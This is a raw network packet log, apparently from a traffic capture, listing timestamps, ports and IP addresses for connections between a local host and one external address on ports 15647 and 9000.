Dec 17, 2024 08:39:02.393704891 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.438772917 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.505546093 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.505667925 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.530255079 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.580009937 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.625449896 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.625731945 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.654155970 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.704488039 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.785495043 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.785734892 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.817790031 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.818084955 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.905551910 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.937563896 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:02.937853098 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:02.993463039 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.009880066 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.050635099 CET	9000	49832	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.050698042 CET	9000	49832	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.050769091 CET	49832	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.050769091 CET	49832	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.057739019 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.057791948 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.129724979 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.159363985 CET	49838	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.170507908 CET	9000	49832	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.173105001 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.177572966 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.177716017 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.245599031 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.279261112 CET	9000	49838	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.279331923 CET	49838	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.279444933 CET	49838	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.294126987 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.297436953 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.297488928 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.370112896 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.399214983 CET	9000	49838	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.417310953 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.417412043 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.489723921 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.532479048 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.537249088 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.548976898 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.609594107 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.657520056 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.668885946 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.670947075 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.729418993 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.782494068 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.790884018 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.861258030 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.880733967 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:03.987591982 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:03.987668991 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.000925064 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.000979900 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.120740891 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.120795012 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.179816961 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.219988108 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.240539074 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.240653038 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.313093901 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.360398054 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.360609055 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.417702913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.470021009 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.480345964 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.480467081 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.505156994 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.548191071 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.609788895 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.609966040 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.616170883 CET	9000	49838	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.616305113 CET	9000	49838	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.616357088 CET	49838	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.616408110 CET	49838	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.736129045 CET	9000	49838	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.752244949 CET	49840	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.773503065 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.773562908 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.792751074 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.845020056 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.872124910 CET	9000	49840	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.872216940 CET	49840	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.872379065 CET	49840	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.893384933 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.893733978 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.921880007 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.970060110 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.985399008 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:04.985591888 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:04.992007017 CET	9000	49840	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.057799101 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.088815928 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.088969946 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:05.105899096 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.209012985 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.209214926 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:05.297887087 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.330687046 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.331213951 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:05.401323080 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.451163054 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.451276064 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:05.523032904 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.523356915 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:05.571278095 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.637857914 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.639415979 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:05.643088102 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.715183020 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.759274006 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.759510040 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:05.829932928 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.876338959 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:05.879251957 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.879333019 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:05.949793100 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.999049902 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:05.999185085 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.071712017 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.071877956 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.118988991 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.119093895 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.191441059 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.191600084 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.196259975 CET	9000	49840	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.196322918 CET	9000	49840	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.196377039 CET	49840	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.196502924 CET	49840	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.238878965 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.311342955 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.312042952 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.317095041 CET	9000	49840	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.318861008 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.319679022 CET	49846	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.431286097 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.438641071 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.439512968 CET	9000	49846	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.439639091 CET	49846	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.443815947 CET	49846	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.451339960 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.563729048 CET	9000	49846	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.571413994 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.571494102 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.631357908 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.673151970 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:06.691395044 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:06.692488909 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.001310110 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.308434963 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.308609009 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.309236050 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.309272051 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.309319019 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.309377909 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.309596062 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.309686899 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.309775114 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.309986115 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.310008049 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.428381920 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.428510904 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.548477888 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.548593044 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.623496056 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.623636007 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.668503046 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.668715000 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.743575096 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.763425112 CET	9000	49846	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.763561010 CET	9000	49846	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.763613939 CET	49846	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.763654947 CET	49846	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.788499117 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.788597107 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.815572977 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.860619068 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.883305073 CET	9000	49846	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.890741110 CET	49851	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:07.936094046 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:07.936222076 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.007698059 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.008479118 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.010569096 CET	9000	49851	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.010665894 CET	49851	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.010777950 CET	49851	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.101521969 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.128061056 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.128185987 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.128247976 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.130466938 CET	9000	49851	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.248013020 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.248251915 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.248400927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.298264980 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.410657883 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.410890102 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.440740108 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.485901117 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.530785084 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.530838966 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.561737061 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.610666037 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.632569075 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.632651091 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.693526030 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.693664074 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.752526999 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.753695965 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.798131943 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.857510090 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.858093023 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.955241919 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.985161066 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:08.985567093 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:08.998913050 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.048140049 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.145525932 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.147512913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.194830894 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.217684984 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.233664989 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.282618999 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.337579966 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.338808060 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.343115091 CET	9000	49851	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.343256950 CET	9000	49851	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.343308926 CET	49851	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.343308926 CET	49851	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.428245068 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.455079079 CET	49853	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.459976912 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.460441113 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.463165045 CET	9000	49851	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.530086994 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.575002909 CET	9000	49853	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.575479031 CET	49853	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.575890064 CET	49853	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.579669952 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.580168009 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.580226898 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.651133060 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.695554018 CET	9000	49853	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.699961901 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.700170994 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.820110083 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.820687056 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.843346119 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.895082951 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:09.981451035 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:09.983660936 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.012404919 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.012466908 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.103595018 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.132488012 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.132581949 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.134654045 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.189373970 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.204444885 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.251333952 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.306382895 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.306549072 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.325754881 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.325850964 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.427048922 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.428744078 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.448122978 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.501991034 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.589472055 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.589538097 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.624428988 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.673142910 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.710786104 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.710901976 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.741672039 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.782633066 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.816471100 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.816742897 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.873569965 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.873727083 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.900127888 CET	9000	49853	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.900170088 CET	9000	49853	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.900365114 CET	49853	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.900365114 CET	49853	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.933823109 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.936814070 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.985693932 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:10.993602991 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:10.993702888 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.001719952 CET	49859	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.020149946 CET	9000	49853	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.113665104 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.114310026 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.121463060 CET	9000	49859	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.122792006 CET	49859	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.122909069 CET	49859	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.129060984 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.173196077 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.185883999 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.235703945 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.242564917 CET	9000	49859	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.281409025 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.281465054 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.305939913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.360619068 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.595037937 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.597896099 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.598212004 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.598263025 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.598314047 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.599694014 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.618616104 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.673186064 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.719373941 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.722048044 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.790153027 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.791802883 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.841754913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.907244921 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:11.910093069 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:11.911499977 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.029928923 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.033768892 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.033998013 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.079575062 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.199348927 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:12.199398041 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:12.222449064 CET	15647	49796	92.255.57.75	192.168.2.11
